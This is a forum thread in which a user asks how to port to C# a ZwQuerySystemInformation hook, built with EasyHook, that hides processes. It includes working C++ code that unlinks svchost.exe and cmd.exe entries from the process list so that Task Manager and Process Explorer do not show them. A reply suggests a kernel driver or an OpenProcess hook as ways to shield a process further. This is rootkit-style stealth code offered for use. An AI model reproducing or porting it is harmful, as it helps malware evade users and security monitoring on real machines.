C# EasyHook SYSTEM_INFORMATION_CLASS

I have a hook of ZwQuerySystemInformation trying to hide a process. All is fine...except making sense of the hooked SystemInformation values. How can I loop thru the process names?(C#)

C++ looks like this: (I'm lost)
NTSTATUS HookNtQuerySystemInformation(ULONG InfoClass,PVOID Buffer,ULONG Length,PULONG ReturnLength)
{
PSYSTEM_PROCESS_INFO pCurr,pNext;
NTSTATUS ret;

if(InfoClass!=5)
{
return fnNtQuerySystemInformation(InfoClass,Buffer,Length ,ReturnLength);
}

ret=fnNtQuerySystemInformation(InfoClass,Buffer,Le ngth,ReturnLength);

if(NT_SUCCESS(ret))
{
pCurr=NULL;
pNext=Buffer;

while(pNext->NextEntryOffset!=0)
{
pCurr=pNext;
pNext=(PSYSTEM_PROCESS_INFO)((PUCHAR)pCurr+pCurr->NextEntryOffset);

if(!wcscmp(L"svchost.exe",pNext->ImageName.Buffer))
{
if(pNext->NextEntryOffset==0)
{
pCurr->NextEntryOffset=0;
}

else
{
pCurr->NextEntryOffset+=pNext->NextEntryOffset;
}

pNext=pCurr;
}

if(!wcscmp(L"cmd.exe",pNext->ImageName.Buffer))
{
if(pNext->NextEntryOffset==0)
{
pCurr->NextEntryOffset=0;
}

else
{
pCurr->NextEntryOffset+=pNext->NextEntryOffset;
}

pNext=pCurr;
}
}
}

return ret;
}

Can anyone convert the above to C#?
My Hook:
static IntPtr NTQuerryInfo_Hooked(SYSTEM_INFORMATION_CLASS SystemInformationClass,
System.IntPtr SystemInformation, uint SystemInformationLength, ref uint ReturnLength)
{
Main This = (Main)HookRuntimeInfo.Callback;


//I need to read the Structure here and remove the process name before returning.....

return ZwQuerySystemInformation(SystemInformationClass,
SystemInformation, SystemInformationLength, ref ReturnLength);
}

Quote:

Originally Posted by cablehead I have a hook of ZwQuerySystemInformation trying to hide a process. All is fine...except making sense of the hooked SystemInformation values. How can I loop thru the process names?(C#) C++ looks like this: (I'm lost) NTSTATUS HookNtQuerySystemInformation(ULONG InfoClass,PVOID Buffer,ULONG Length,PULONG ReturnLength) { PSYSTEM_PROCESS_INFO pCurr,pNext; NTSTATUS ret; if(InfoClass!=5) { return fnNtQuerySystemInformation(InfoClass,Buffer,Length ,ReturnLength); } ret=fnNtQuerySystemInformation(InfoClass,Buffer,Le ngth,ReturnLength); if(NT_SUCCESS(ret)) { pCurr=NULL; pNext=Buffer; while(pNext->NextEntryOffset!=0) { pCurr=pNext; pNext=(PSYSTEM_PROCESS_INFO)((PUCHAR)pCurr+pCurr->NextEntryOffset); if(!wcscmp(L"svchost.exe",pNext->ImageName.Buffer)) { if(pNext->NextEntryOffset==0) { pCurr->NextEntryOffset=0; } else { pCurr->NextEntryOffset+=pNext->NextEntryOffset; } pNext=pCurr; } if(!wcscmp(L"cmd.exe",pNext->ImageName.Buffer)) { if(pNext->NextEntryOffset==0) { pCurr->NextEntryOffset=0; } else { pCurr->NextEntryOffset+=pNext->NextEntryOffset; } pNext=pCurr; } } } return ret; } Can anyone convert the above to C#? My Hook: static IntPtr NTQuerryInfo_Hooked(SYSTEM_INFORMATION_CLASS SystemInformationClass, System.IntPtr SystemInformation, uint SystemInformationLength, ref uint ReturnLength) { Main This = (Main)HookRuntimeInfo.Callback; //I need to read the Structure here and remove the process name before returning..... return ZwQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ref ReturnLength); }

If you want to "hide" a process you will need to make a driver in kernel mode to hide it..you should search for "windows driver kit" in google but it is not easy at all as programming since you will have to play with undocumented routines (NTxxx and ZWxxx) and it is easy to make a blue screen of death... And I don't think that you can do it in c# (most drivers are written in C) Now, even if you "hide" your process, it is ALWAYS possible to find it => brute force!!

Instead, try to hook OpenProcess() routine in kernel mode (make a driver) so other processes don't get access to it. Well, it depends on what you are looking for..

The C code posted is working to hide a process...from task manager, process explorer etc. My C# API hook (EasyHook) to NTQuerry is also working fine...I can actually get a list of processes every time it fires....but...my list is returned as an array of SYSTEM_PROCESS_INFORMATION structures....in an IntPtr..

The posted code modifies one offset/process structure of the array.(the exe to be hidden) and returns the modified array.

That where Im stuck..